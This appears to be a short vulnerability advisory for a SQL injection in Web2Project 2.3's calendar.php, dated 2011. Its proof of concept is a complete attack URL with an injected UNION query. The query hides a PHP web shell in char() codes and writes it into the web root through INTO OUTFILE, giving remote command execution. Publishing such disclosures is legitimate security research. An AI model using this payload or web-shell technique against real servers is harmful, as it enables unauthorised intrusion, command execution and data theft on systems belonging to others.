# ------------------------------------------------------------------------# Software................Web2Project 2.3# Vulnerability...........SQL Injection# Threat Level............Critical (4/5)# Download................http://forums.web2project.net/# Discovery Date..........4/21/2011# Tested On...............Windows Vista + XAMPP# ------------------------------------------------------------------------# Author..................AutoSec Tools# Site....................http://www.autosectools.com/# Email...................John Leitch <john@autosectools.com># ------------------------------------------------------------------------# # # --Description--# # A SQL injection vulnerability in Web2Project 2.3 can be exploited to# extract arbitrary data. In some environments it may be possible to# create a PHP shell.# # # --PoC--
http://localhost/web2project-2.3/calendar.php?token='UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62))/**/FROM/**/dual/**/INTO/**/OUTFILE'../../htdocs/shell.php'%23